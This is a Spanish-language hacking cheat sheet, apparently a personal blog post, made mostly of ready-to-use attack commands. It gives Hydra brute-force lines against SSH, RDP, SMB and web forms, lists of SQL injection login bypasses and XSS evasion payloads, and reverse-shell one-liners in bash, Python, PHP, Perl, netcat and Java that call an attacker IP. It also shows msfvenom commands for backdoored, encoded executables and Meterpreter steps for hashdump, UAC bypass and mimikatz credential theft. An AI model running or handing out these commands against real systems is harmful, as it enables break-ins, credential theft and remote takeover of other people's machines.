Guia Completa de Hacking

Hello Hackers!!
El siguiente Post es una recopilacion completa donde expongo una guia completa de como enumerar, atacar y explotar diferentes servicios.

Nota:
Debido al gran contenido que abarca la seguridad informatica, este post esta en constante actualizacion.
- Ultima Actualizacion: 18 De Junio del 2019

Tabla de contenido

Enumeracion Inicial
Enumerando el servicio FTP (Puerto 21)
Enumerando el servicio SSH (Puerto 22)
Enumerando el servicio SMTP (Puerto 25)
Enumerando servicios WEB (Puerto 80/443)
Enumerando el servicio SMB (Puerto 139/445)
Enumerando el servicio Finger (Puerto 79)
Enumerando el servicio POP3 (Puerto 110)
Enumerando el protocolo RPCBind (Puerto 111)
Enumerando el servicio SNMP (Puerto 161)
Enumerando MySQL
Enumerando Oracle
SQL Injections
XSS Injections
Realizando transferencias de zonas DNS
Montando Sistemas de archivos compartidos
Tecnicas de Fingerprinting
Realizando busqueda de Exploits
Como compilar Exploits
Sniffeando Trafico
Crackeando Contraseñas
Realizando Ataques de fuerza bruta
Generacion de shell inversas
Obteniendo Shell TTY interactiva
Aprendiendo a usar Metasploit

Hacking Desde 0

Enumeracion Inicial

# Escaneo sencillo con Nmap 
nmap -v -sV -T4 192.168.6.66
# Ejecucion de nmap hacia todos los puertos, sin realizar descubrimiento de ping, ejecutando scripts de la categoria vuln con la velocidad T4 
nmap -v -Pn -T4 -p- --script vuln -oN machine.nmap 192.168.6.66
# Escaneo de todos los puertos con Masscan
masscan 192.168.6.66 -p0-65535

Enumerando FTP

Comando FTP Descripcion del Comando
cd Cambiar del directo remoto
dir listar el contenido de un directorio
get descargar un archivo
ls listar el contenido de un directorio
mget descargar de multiples archivos
mkdir Crear un directorio en la maquina remota
mput Subir multiples archivos al servidor
open Conectar al servidor FTP
put Subir un archivo
quit Finalizar la sesion de FTP
# Banner grab
nc 192.168.6.66 21
# Ejecucion de Scripts de Nmap sobre un servidor FTP
nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 192.168.6.66
# Validando inicio de sesion anonimo, las credenciales para este son: anonymous:anonymous
ftp 192.168.6.66
# Realizando Ataque fuerza bruta con hydra hacia el servicio FTP
hydra 192.168.6.66 ftp -l username -P /usr/share/wordlists/rockyou.txt -e ns -vV

Archivos de configuracion relacionados a FTP

  • ftpusers
  • ftp.conf
  • proftpd.conf

Enumerando SSH

# Iniciar sesion por SSH
ssh usuario@192.168.6.66
# Fuerza Bruta para el servicio SSH con Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.6.66 -t 4 ssh

Programas clientes para SSH
tunnelier
winsshd
putty
winscp

Archivos de configuracion relacionados a SSH

  • ssh_config
  • sshd_config
  • authorized_keys
  • ssh_known_hosts
  • .shosts

Enumerando SMTP

SMTP Command Description of Command
HELO It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.
EHLO An alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.
MAIL FROM With this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer.
RCPT TO It identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.
DATA With the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.
VRFY The server is asked to verify whether a particular email address or username actually exists.
QUIT It terminates the SMTP conversation.
# Banner grab
nc 192.168.6.66 25
# Banner grab
telnet 192.168.6.66 21
#Ejecuccion de scripts de Nmap Sobre un servidor SMTP
nmap –script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 192.168.6.66

Mail Spoof Test

  
HELO anything.com  
MAIL FROM: spoofed_address  
RCPT TO:valid_mail_account  
DATA   
.   
QUIT  

Archivos de configuracion relacionados a SMTP

sendmail.cf
submit.cf

Enumerando un sitio WEB

Como realizar un descubrimiento de directorios:

dirb http://10.0.0.1/
gobuster -w diccionario.txt -u http://10.10.10.59/

Realizando un analisis de vulnerabilidades con Nikto

nikto -h 10.0.0.1

Crackear peticiones GET

hydra -l username -p wordlist -t thread -vV -e ns IP http-get /admin/
hydra -l username -p wordlist -t thread -vV -e ns -f IP http-get /admin/index.php  

Crackear peticiones POST
Ejemplo de formulario WEB a crackear

<form action=”index.php” method=”POST”>
  <input type=”text” name=”name” /><br><br>
  <input type=”password” name=”pwd” /><br><br>
  <input type=”submit” name=”sub” value=”submit”>
</form>

Commando para Cracking de formularios POST:

hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^ <title>invalido</title>

Herramientas Utiles
Burpsuite

Archivos de configuracion relacionados a sitios web

  • Examinar httpd.conf/
  • JBoss
    • JMX Console http://:8080/jmxconcole/
      • War File
  • Joomla
    • configuration.php
    • diagnostics.php
    • joomla.inc.php
    • config.inc.php
  • Mambo
    • configuration.php
    • config.inc.php
  • Wordpress
    • setup-config.php
    • wp-config.php

Enumerando SMB

enum4linux –a 10.0.0.1

Para Descubrir servidores SAMBA de Windows en la subred, encuentrar las direcciones MAC de Windows, el nombre de netbios y descubrimiento del grupo de trabajo y dominio del cliente

nbtscan x.x.x.x

Escaneo con Nmap y ejecucion de Scripts relacionados.

nmap IPADDR --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse

Listado de archivos de un servidor SMB.

smbclient -L //INSERTIPADDRESS/
   
---------------------
-- COMANDOS UTILES --
---------------------
smbclient \\\\10.10.10.59\\ACCT

Ataque de diccionario hacia el servicio de SMB

hydra -l administrator -P pass.txt IP smb

Archivos de configuracion relacionados a SMB

  • Smb.conf
  • lmhosts

Enumerando Finger

Descargar el siguiente script para enumerar este servicio:
http://pentestmonkey.net/tools/user-enumeration/finger-user-enum

---------------------
-- COMANDOS UTILES --
---------------------
finger 'a b c d e f g h' @example.com
finger admin@example.com
finger user@example.com
finger 0@example.com
finger .@example.com
finger **@example.com
finger test@example.com
finger @example.com

Probando Ejecucion de comandos

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Enumerando POP3

---------------------
-- COMANDOS UTILES --
---------------------
telnet INSERTIPADDRESS 110
Ingresa tu usuario [username]
Ingresa tu contraseña [password]
- Despues de iniciar sesion. -

list
- El comando anterior lista los mensajes. -

Escaneo con Nmap y ejecucion de Scripts relacionados.

nmap -p110 –script pop3-brute google.com
nmap -p110 –script pop3-capabilities target

Usando Hydra sobre POP3

hydra -l muts -P pass.txt my.pop3.mail pop3

Enumerando SNMP

snmpwalk -c public -v1 10.0.0.0
snmpcheck -t 192.168.1.X -c public
onesixtyone -c names -i hosts
nmap -sT -p 161 192.168.X.X -oG snmp_results.txt
snmpenum -t 192.168.1.X

Archivos de configuracion relacionados a SNMP

  • snmp.conf
  • snmpd.conf
  • snmp-config.xml

Enumerando MySQL

mysql -h <Hostname> -u root@localhost

Escaneo con Nmap y ejecucion de Scripts relacionados.

nmap -sV -Pn -vv  10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
---------------------
-- COMANDOS UTILES --
---------------------
-- Ver base de datos disponibles.
SHOW DATABASES;
-- Crear una base de datos
CREATE DATABASE mydb;
-- Seleccionar una base de datos para proximas consultas.
USE mydb;
-- Eliminar una base de datos
DROP DATABASE mydb;
-- Obtener tablas de una base de datos
SHOW TABLES;
-- Crear una tabla
CREATE TABLE table1;
-- MOSTRAR DATOS
SELECT * FROM table1;

Archivos relacionados a MYSQL
WINDOWS

  • config.ini
  • my.ini
  • windows\my.ini
  • winnt\my.ini
  • /mysql/data/

UNIX

  • my.cnf
  • /etc/my.cnf
  • /etc/mysql/my.cnf
  • /var/lib/mysql/my.cnf
  • ~/.my.cnf
  • /etc/my.cnf

Otros Archivos.

  • connections.log
  • update.log
  • common.log

Creaccion de usuarios
Crear usuario y otorgarle privilegios:

mysql>create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

Escalando privilegios

  
mysql> \! cat /etc/passwd
mysql> \! bash

Enumerando Oracle

tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS

Contraseñas por defecto:

http://www.vulnerabilityassessment.co.uk/default_oracle_passwords.htm

SQL Injections

Inyeccion en formularios de inicio de sesion

  
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1-- -
' or 1=1#
') or '1'='1--
') or ('1'='1
' or 1=1/*
root' --
root' #
root'/*
root' or '1'='1
root' or '1'='1'--
root' or '1'='1'#
root' or '1'='1'/*
root'or 1=1 or ''='
root' or 1=1
root' or 1=1--
root' or 1=1#
root' or 1=1/*
root') or ('1'='1
root') or ('1'='1'--
root') or ('1'='1'#
root') or ('1'='1'/*
root') or '1'='1
root') or '1'='1'--
root') or '1'='1'#
root') or '1'='1'/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
root" --
root" #
root"/*
root" or "1"="1
root" or "1"="1"--
root" or "1"="1"#
root" or "1"="1"/*
root" or 1=1 or ""="
root" or 1=1
root" or 1=1--
root" or 1=1#
root" or 1=1/*
root") or ("1"="1
root") or ("1"="1"--
root") or ("1"="1"#
root") or ("1"="1"/*
root") or "1"="1
root") or "1"="1"--
root") or "1"="1"#

Luego de encontrar un sitio vulnerable a una inyeccion SQL

union select 1,2-- -
union select 1,@@version
union select all 1,database()
union select all 1,table_schema from information_schema.tables 
union select all 1,table_name from information_schema.tables where table_schema='sysadmin' 
union select all 1,column_name from information_schema.columns where table_name='users' 
union select 1,(select group_concat(username,password) from sysadmin.users) 

Uso de SQLMAP

sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump

XSS Injections

Prueba de XSS básica sin filtro de evasión

  
<SCRIPT SRC=http://192.168.1.5/xss.js></SCRIPT>   

Usando la etiqueta IMG con la directiva de JavaScript

  
<img SRC="javascript:alert('Hacked By Gerh');">    

Evadiendo filtros anti XSS haciendo uso de minusculas y mayusculas

  
<img SRC="JaVaScRiPt:alert('XSS')">  

Etiquetas IMG mal formadas

  
<img """><SCRIPT>alert("XSS")</SCRIPT>">  

Haciendo uso del parametro onerror

  
<img SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>  

Haciendo uso de representación hexadecimal

    
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 72, 97, 99, 107, 101, 100, 32, 66, 121, 32, 71, 101, 114, 104, 34, 41))</script>

Referencia importante: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

DNS Zone Transfers

nslookup -> set type=any -> ls -d blah.com
dig axfr blah.com @ns1.blah.com

Enumerando

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
dnsenum --noreverse -o mydomain.xml example.com

Montando recursos compartidos

showmount -e IPADDR

Montando el recurso compartido en /mnt/nfs sin bloquearlo

mount 192.168.1.1:/vol/share /mnt/nfs  -nolock

Montando recurso compartido de Windows CIFS/SMB, en Linux en la ruta /mnt/cifs.

mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs

Montando recursos compartidos en Windows.

net use Z: \\win-server\share password  /user:domain\janedoe /savecred /p:no

Tecnicas de Fingerprinting

nc -v 192.168.1.1 25
telnet 192.168.1.1 25
nmap -o -v binarychaos.com

Busqueda de Exploits

En el siguiente ejemplo realizo una busqueda de exploits relacionados a windows 8.1

searchsploit windows 8.1 | grep -i local

Compilando Exploits

gcc -o exploit exploit.c
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Sniffer Trafic

En el siguiente comando, realizo una captura de los paquetes del puerto 80 por el protocolo TCP por medio de la interfaz eth0 y exporto el resultado en un archivo con nombre output.pcap.

tcpdump tcp port 80 -w output.pcap -i eth0

Password Cracking

Para la identificacion del tipo de hash utilizar:

https://www.tunnelsup.com/hash-analyzer/
hash-identifier [hash]
john hashes.txt

Ejemplos de uso de Hashcat:

hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlists/rockyou.txt

Lista de tipos de hash’s soportados por Hashcat:

https://hashcat.net/wiki/doku.php?id=example_hashes 

Bruteforcing

Ejemplos del uso de Hydra
Fuerza bruta a formulario enviado por Peticion POST

hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin
hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt IPADDR PROTOCOL

Usando Hydra para realizar un ataque de fuerza bruta hacia el servicio de SSH

hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

Usando Hydra para realizar un ataque de fuerza bruta hacia HTTPS

hydra -m /index.php -l username -P pass.txt IP https

Usando Hydra para realizar un ataque de fuerza bruta hacia teamspeak

hydra -l username -P wordlist -s portnumber -vV ip teamspeak

Usando Hydra para realizar un ataque de fuerza bruta hacia CISCO

hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt 192.168.1.11 cisco-enable

Usando Hydra para realizar un ataque de fuerza bruta hacia el servicio de SMB

hydra -l administrator -P pass.txt IP smb

Usando Hydra para realizar un ataque de fuerza bruta hacia el servicio de POP3

hydra -l muts -P pass.txt my.pop3.mail pop3

Usando Hydra para realizar un ataque de fuerza bruta hacia el servicio de RDP

hydra IP rdp -l administrator -P pass.txt -V

Usando Hydra para realizar un ataque de fuerza bruta hacia el servicio de http-proxy

hydra -l admin -P pass.txt http-proxy://192.168.1.111

Usando Hydra para realizar un ataque de fuerza bruta hacia el servicio de TELNET

hydra IP telnet -l username -P wordlist -t 32 -s 23 -e ns -f -V

Usando Hydra para realizar un ataque de fuerza bruta hacia el servicio de FTP

hydra IP ftp -l username -P wordlist -t thread(default 16) -vV
hydra IP ftp -l username -P wordlist -e ns -vV

Generacion de diccionarios

crunch 15 15 -f /usr/share/crunch/charset.lst symbols14 -t Th4C00lTheacha@ -o bruteforce.dic
---------------------
-- COMANDOS UTILES --
---------------------
for i in {0..9}; do echo Th4C00lTheacha$i; done >> hoola.txt

Shell-Reverse

BASH

  
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

  
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

  
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

  
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

RUBY

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

//Ejecutar lo siguiente en la victima:  
// IP VICTIMA = 10.10.10.69

nc -e /bin/sh 10.10.14.10 1234

//Luego de ejecutar lo anterior en el equipo victima, ejecutar lo siguiente en la maquina atacante:  
// IP ATACANTE = 10.10.14.10

nc -nvlp 10.10.10.69

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

JAVA

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Obtener Shell TTY interactiva

python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
execute('/bin/sh')
  
perl -e 'exec "/bin/sh";'
ruby: exec "/bin/sh"

Usando vi / vim

:!bash

Usando man, more, less

!bash

Metasploit

Generacion de payloads con msfvenom

Web Payloads

Comandos Explicacion
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php Creacion de Shell Inversa para PHP por el protocolo TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp Creacion de Shell Inversa para ASP por el protocolo TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp Creacion de Shell Inversa para JSP por el protocolo TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war Creacion de Shell Inversa para WAR por el protocolo TCP

Windows Payloads

Comandos Explicacion
msfvenom -l encoders Lista los encoders disponibles
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Enlazar un ejecutable con un backdoor ejecutable EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe Crea una carga útil simple para el protocolo TCP con el codificador shikata_ga_nai
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe Enlazar un ejecutable con un backdoor y lo codifica con shikata_ga_nai

Binaries

Comandos Explicacion
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creacion de una carga útil simple para Windows usando el protocolo TCP
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creacion de una carga útil simple para Windows usando el protocolo HTTP
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Creacion de una carga útil simple para Linux usando el protocolo TCP
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho Creacion de una shell simple para MAC usando el protocolo TCP
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk Creacion de una carga útil simple para Android usando el protocolo TCP

Como conseguir una shell con meterpreter!

  
╭─[~/Desktop/APOLO/Ethic4l-Hacking/]─[root@Arthorias]─[0]─[4186]
╰─[:)] # msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

Como usar Meterpreter

Luego de comprometer una maquina y tener una shell de meterpreter, hay multiples comandos que nos facilitaran la vida en la hora de interactuar con nuestra maquina victima.

Comandos Utiles Como subir un archivo a una maquina comprometida con windows

  
upload file c:\\windows

Como descargar un archivo que este alojado en el equipo victima y guardarlo en nuestro equipo.

  
download c:\\windows\\repair\\sam /tmp

Como ejecutar archivos (EXE) alojados en la maquina comprometida.
Esto es util para la ejecucion de exploits.

  
execute -f c:\\windows\temp\exploit.exe

Crea un nuevo canal con una Shell de CMD

  
execute -f cmd -c

Como ver los procesos que corre nuestra maquina comprometida.

  
ps

Como obtener una shell en la maquina comprometida.

  
shell

Realizar un intento para escalar privilegios sobre el sistema.

  
getsystem

El comando hashdump permite obtener los usuarios y el hash de los passwords de la maquina remota en formato SAM, de esta forma se puede crakear la clave de un usuario determinado usando herramientas como john the ripper o ophcrack

  
hashdump

Como redirigir puertos a través de la máquina comprometida hacia nosotros los atacantes.

  
portfwd add -l 3389 -p 3389 -r target

Eliminar alguna redireccion de puertos previamente configurada.

  
portfwd delete -l 3389 -p 3389 -r target

Burlar el Control de Cuentas de Usuario (UAC) en Windows 7 // Indicar la IP de la victima como target + arch, x86/64

  
use exploit/windows/local/bypassuac

Analizador de directorios HTTP

  
use auxiliary/scanner/http/dir_scanner

Escaner de vulnerabilidades para JBOSS

  
use auxiliary/scanner/http/jboss_vulnscan

Modulo para autenticarse en el servicio MSSQL.

  
use auxiliary/scanner/mssql/mssql_login

Identificar la version de MySQL.

  
use auxiliary/scanner/mysql/mysql_version

Modulo para autenticarse en el servicio de Oracle

  
use auxiliary/scanner/oracle/oracle_login

Ejecucion de script en powershell para una sesion de meterpreter

  
post/windows/manage/powershell/exec_powershell

Ver privilegios del usuario actual.

  
run post/windows/gather/win_privs

Obtener contraseñas guardadas GPP

  
use post/windows/gather/credentials/gpp

Cargar Mimikatz/kiwi para conseguir credenciales de usuarios autenticados.

  
load kiwi
creds_all

About the author:

Profile Image

Gerardo Eliasib

Ethical Hacker - FullStack Developer

Cybersecurity Consultant and also creator of the content published in this blog.